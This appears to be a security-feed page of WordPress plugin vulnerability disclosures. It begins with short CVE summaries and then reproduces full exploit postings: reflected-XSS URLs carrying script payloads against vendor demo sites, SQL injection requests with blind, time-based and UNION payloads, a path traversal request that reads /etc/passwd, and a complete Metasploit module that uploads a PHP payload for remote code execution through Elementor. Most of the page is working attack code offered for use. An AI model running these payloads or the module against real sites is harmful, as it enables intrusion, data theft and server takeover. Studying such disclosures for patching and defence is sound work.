The Disable User Login WordPress plugin through 1.0.1 does not have authorisation and CSRF checks when updating its settings, allowing unauthenticated attackers to block (or unblock) users at will.

CVE-2022-2350

The Slider, Gallery, and Carousel by MetaSlider WordPress plugin before 3.27.9 does not sanitise and escape some of its Gallery Image parameters, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)

CVE-2022-2823

The reSmush.it WordPress plugin before 0.4.6 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when unfiltered_html is disallowed.

CVE-2022-2448

The Enable Media Replace WordPress plugin before 4.0.0 does not ensure that renamed files are moved to the Upload folder, which could allow high privilege users such as admin to move them outside to the web root directory via a path traversal attack for example

CVE-2022-2554

The Top Bar WordPress plugin before 3.0.4 does not sanitise and escape some of its settings before outputting them in frontend pages, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)

CVE-2022-2629

WordPress eCommerce Product Catalog plugin version 3.0.70 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable Crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : wordpress.org/plugins/ecommerce-product-catalog/                           ││  Vendor   : impleCode - implecode.com                                                  ││  Software : WordPress eCommerce Product Catalog 3.0.70                                 ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘URL parameter 'product_category' is vulnerable to XSSPath: /product-category/clothing/sunglasses/men/ https://demo.implecode.com/product-category/clothing/sunglasses/men/?product_category=40&gr0ln%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ewop2e=1[-] Done

WordPress eCommerce Product Catalog 3.0.70 Cross Site Scripting

WordPress / Joomla JReviews extension version 4.1.5 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : extensions.joomla.org                                                      ││  Vendor   : ClickFWD LLC. - jreviews.com                                               ││  Software : WordPress JReviews 4.1.5                                                   ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘URL parameter 'listview' is vulnerable to XSSPath: /top-user-rated-listings https://wp-demo.jreviews.com/top-user-rated-listings?listview=2&qrrwx%22%3e%3cscript%3ealert(1)%3c%2fscript%3et16n9=1URL parameter 'format' is vulnerable to XSSPath: /advanced-search/search-resultshttps://wp-demo.jreviews.com/advanced-search/search-results?pg=2&order=featured&query=all&format=raw&mzh9g%22%3e%3cscript%3ealert(1)%3c%2fscript%3ei8emo=1[-] Done

WordPress / Joomla JReviews 4.1.5 Cross Site Scripting

WordPress Zephyr Project Manager plugin version 3.2.42 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Wordpress Plugin Zephyr Project Manager 3.2.42 - Multiple SQLi# Date: 14-08-2022# Exploit Author: Rizacan Tufan# Blog Post: https://rizax.blog/blog/wordpress-plugin-zephyr-project-manager-multiple-sqli-authenticated# Software Link: https://wordpress.org/plugins/zephyr-project-manager/# Vendor Homepage: https://zephyr-one.com/# Version: 3.2.42# Tested on: Windows, Linux# CVE : CVE-2022-2840 (https://wpscan.com/vulnerability/13d8be88-c3b7-4d6e-9792-c98b801ba53c)# DescriptionZephyr Project Manager is a plug-in that helps you manage and get things done effectively, all your projects and tasks.It has been determined that the data coming from the input field in most places throughout the application are used in=20the query without any sanitize and validation.The details of the discovery are given below.# Proof of Concept (PoC)=20The details of the various SQL Injection on the application are given below.## Endpoint of Get Project Data.Sample Request :=20POST /wp-admin/admin-ajax.php HTTP/2Host: vuln.localCookie: ......Referer: https://vuln.local/wp-admin/admin.php?page=3Dzephyr_project_manager_projectsContent-Type: application/x-www-form-urlencoded; charset=3DUTF-8X-Requested-With: XMLHttpRequestContent-Length: 74Origin: https://vuln.localSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersaction=3Dzpm_view_project&project_id=3D1&zpm_nonce=3D22858bf3a7Payload :=20---Parameter: project_id (POST)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: action=3Dzpm_view_project&project_id=3D1 AND 4923=3D4923&zpm_nonce=3D22858bf3a7    Type: time-based blind    Title: MySQL >=3D 5.0.12 OR time-based blind (query SLEEP)    Payload: action=3Dzpm_view_project&project_id=3D1 OR (SELECT 7464 FROM (SELECT(SLEEP(20)))EtZW)&zpm_nonce=3D22858bf3a7    Type: UNION query    Title: Generic UNION query (NULL) - 20 columns    Payload: action=3Dzpm_view_project&project_id=3D-4909 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71707a7071,0x6264514e6e4944795a6f6e4a786a6e4d4f666255434d6a5553526e43616e52576c75774743434f67,0x71786b6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&zpm_nonce=3D22858bf3a7---## Endpoint of Get Task Data.Sample Request :=20POST /wp-admin/admin-ajax.php HTTP/2Host: vuln.localCookie: ......Referer: https://vuln.local/wp-admin/admin.php?page=3Dzephyr_project_manager_tasksContent-Type: application/x-www-form-urlencoded; charset=3DUTF-8X-Requested-With: XMLHttpRequestContent-Length: 51Origin: https://vuln.localSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailerstask_id=3D1&action=3Dzpm_view_task&zpm_nonce=3D22858bf3a7Payload :=20---Parameter: task_id (POST)    Type: time-based blind    Title: MySQL >=3D 5.0.12 AND time-based blind (query SLEEP)    Payload: task_id=3D1 AND (SELECT 5365 FROM (SELECT(SLEEP(20)))AdIX)&action=3Dzpm_view_task&zpm_nonce=3D22858bf3a7---## Endpoint of New Task.Sample Request :=20POST /wp-admin/admin-ajax.php HTTP/2Host: vuln.localCookie: ......Referer: https://vuln.local/wp-admin/admin.php?page=3Dzephyr_project_manager_tasksContent-Type: application/x-www-form-urlencoded; charset=3DUTF-8X-Requested-With: XMLHttpRequestContent-Length: 337Origin: https://vuln.localSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailerstask_name=3Dtest&task_description=3Dtest&task_project=3D1&task_due_date=3D&task_start_date=3D&team=3D0&priority=3Dpriority_none&status=3Dtest&type=3Ddefault&recurrence%5Btype%5D=3Ddefault&parent-id=3D-1&action=3Dzpm_new_task&zpm_nonce=3D22858bf3a7Payload :=20---Parameter: task_project (POST)    Type: time-based blind    Title: MySQL >=3D 5.0.12 AND time-based blind (query SLEEP)    Payload: task_name=3Dtest&task_description=3Dtest&task_project=3D1 AND (SELECT 3078 FROM (SELECT(SLEEP(20)))VQSp)&task_due_date=3D&task_start_date=3D&team=3D0&priority=3Dpriority_none&status=3Drrrr-declare-q-varchar-99-set-q-727aho78zk9gcoyi8asqud6osfy9m0io9hx9kz8o-oasti-fy-com-tny-exec-master-dbo-xp-dirtree-q&type=3Ddefault&recurrence[type]=3Ddefault&parent-id=3D-1&action=3Dzpm_new_task&zpm_nonce=3D22858bf3a7---

WordPress Zephyr Project Manager 3.2.42 SQL Injection

WordPress WPvivid Backup plugin versions prior to 0.9.76 suffer from a path traversal vulnerability.

=====[ Tempest Security Intelligence - ADV-15/2022  
]==========================

Wordpress plugin - WPvivid Backup - Version < 0.9.76

Author: Rodolfo Tavares

Tempest Security Intelligence - Recife, Pernambuco - Brazil

=====[ Table of Contents]==================================================  
 * Overview  
 * Detailed description  
 * Timeline of disclosure  
 * Thanks & Acknowledgements  
 * References

=====[ Vulnerability  
Information]=============================================  
 * Class: Improper Limitation of a Pathname to a Restricted Directory  
('Path Traversal')  
 ('Path Traversal') [CWE-22]

 * CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H  
 * CVSS Base Score 7.2

=====[ Overview]========================================================  
 * System affected : Wordpress plugin - WPvivid Backup  
 * Software Version : Version < 0.9.76  
 * Impacts : The plugin WPvivid Backup does not sanitise and validate a  
parameter before using it to read the content of a file, allowing high  
privilege users to read any file from the web server via a Traversal attack.

=====[ Detailed  
description]=================================================  
 * Steps to reproduce

1 - Authenticated as privilege user, copy the request below, change the  
placeholder {{nonce}} with a valid nonce:  
 ```

https://example.com/wp-admin/admin-ajax.php?_wpnonce={{nonce}}&action=wpvivid_download_export_backup&file_name=../../../../../../../etc/passwd&file_size=922  
 ```

=====[ Timeline of  
disclosure]===============================================

11/Aug/2022 - Responsible disclosure was initiated with the vendor.  
15/Aug/2022 - WPvivid Support confirmed the issue.  
16/Aug/2022 - WPvivid Support fix the issue.  
08/Aug/2022 - CVEs was assigned and reserved as CVE-2022-2863.

=====[ Thanks & Acknowledgements]========================================  
 * Tempest Security Intelligence [5]

=====[ References ]=====================================================

[1][ [  
https://cwe.mitre.org/data/definitions/22.html]|https://cwe.mitre.org/data/definitions/22.html  
]]  
[2][ [  
https://gist.github.com/rodnt/c6eb8c8237d6ea0583f1f7da139c742a]|https://gist.github.com/rodnt/c6eb8c8237d6ea0583f1f7da139c742a  
[3][ [https://www.tempest.com.br|https://www.tempest.com.br/]]  
[4][ [  
https://wpscan.com/vulnerability/cb6a3304-2166-47a0-a011-4dcacaa133e5]|https://wpscan.com/vulnerability/cb6a3304-2166-47a0-a011-4dcacaa133e5]]  
]  
[5][ [Thanks FXO,ACPM,MFPP]]

=====[ EOF ]===========================================================  
--

WordPress WPvivid Backup Path Traversal

WordPress Elementor plugin versions 3.6.0 through 3.6.2 suffer from a remote shell upload vulnerability. This is achieved by sending a request to install Elementor Pro from a user supplied zip file. Any user with Subscriber or more permissions is able to execute this.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::CmdStager  include Msf::Exploit::Remote::HTTP::Wordpress  include Msf::Exploit::FileDropper  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Wordpress Plugin Elementor Authenticated Upload Remote Code Execution',        'Description' => %q{          The WordPress plugin Elementor versions 3.6.0 - 3.6.2, inclusive have a vulnerability          that allows any authenticated user to upload and execute any PHP file. This is achieved          by sending a request to install Elementor Pro from a user supplied zip file.          Any user with Subscriber or more permissions is able to execute this.          Tested against Elementor 3.6.1        },        'License' => MSF_LICENSE,        'Author' => [          'Ramuel Gall', # Discovery          'AkuCyberSec', # Exploit-db          'h00die' # Metasploit module        ],        'References' => [          ['EDB', '50115'],          ['CVE', '2022-1329'],          ['URL', 'https://www.wordfence.com/blog/2022/04/elementor-critical-remote-code-execution-vulnerability/'],          ['URL', 'https://www.youtube.com/watch?v=tIhN1svzAYk'] # great video about the exploit        ],        'Platform' => [ 'php' ],        'Arch' => ARCH_PHP,        'Targets' => [          [ 'Wordpress Elementor', {}]        ],        'Privileged' => false,        'DisclosureDate' => '2022-03-29',        'Notes' => {          'Stability' => [ CRASH_SAFE ],          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],          'Reliability' => [ REPEATABLE_SESSION ]        }      )    )    register_options [      OptString.new('USERNAME', [true, 'Username of a subscriber or higher account', '']),      OptString.new('PASSWORD', [true, 'Password of a subscriber or higher account', '']),      OptString.new('TARGETURI', [true, 'The base path of the Wordpress server', '/'])    ]  end  def check    unless wordpress_and_online?      return CheckCode::Safe('Server not online or not detected as Wordpress')    end    cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])    CheckCode::Safe('Invalid credentials given!') unless cookie    return check_plugin_version_from_readme('elementor', '3.6.3', '3.6.0')  end  def upload_file(nonce, cookie)    zip_file = Rex::Zip::Archive.new    payload_name = 'elementor-pro.php'    print_status("Payload file name: #{payload_name}")    # we end up in wp-admin, so we need to get to the right folder    register_dirs_for_cleanup('../wp-content/plugins/elementor-pro')    # payload must contain a Plugin Name header with the name of the plugin    pload = "<?php\n"    pload << "/**\n"    pload << "* Plugin Name: Elementor Pro\n"    pload << "*/\n"    pload << payload.encoded.gsub('/*<?php /**/ ', '')    pload << "\n?>"    zip_file.add_file("/elementor-pro/#{payload_name}", pload)    vars_form_data = [      # post_data.add_part('elementor_upload_and_install_pro', nil, nil, 'form-data; name="action"')      {        'name' => 'action',        'data' => 'elementor_upload_and_install_pro'      },      # post_data.add_part(nonce, nil, nil, 'form-data; name="_nonce"')      {        'name' => '_nonce',        'data' => nonce      },      # post_data.add_part(zip_file.pack, 'application/x-zip-compressed', 'binary', 'form-data; name="fileToUpload"; filename="elementor-pro.zip"')      {        'name' => 'fileToUpload',        'data' => zip_file.pack,        'encoding' => 'binary',        'filename' => 'elementor-pro.zip',        'mime_type' => 'application/x-zip-compressed'      }    ]    resp = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'),      'cookie' => cookie,      'vars_form_data' => vars_form_data    )    # we get a timeout on success    if resp.nil?      print_good('Payload Uploaded Successfully')      return    end    fail_with(Failure::UnexpectedReply, 'Error uploading payload')  end  def get_nonce(cookie)    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'wp-admin', 'profile.php'),      'cookie' => cookie    )    unless res && (res.code == 200)      fail_with(Failure::UnexpectedReply, "Could not get the nonce (#{res.code})")    end    # find the RIGHT nonce, there are many nonces on the page, but we need the admin-ajax one    res.body.scan(/admin-ajax.php","nonce":"([a-z0-9]+)"/)[0][0].to_s  end  def exploit    cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])    fail_with(Failure::NoAccess, 'Authentication failed') unless cookie    cookie = cookie.gsub('wordpress_test_cookie=WP%20Cookie%20check; ', '')    print_status('Looking for nonce')    nonce = get_nonce(cookie)    fail_with(Failure::NoAccess, 'Unable to find nonce') if nonce.nil?    print_good("Nonce: #{nonce}")    print_status('Uploading upgrade payload and activating...')    upload_file(nonce, cookie)  endend

Tag

#wordpress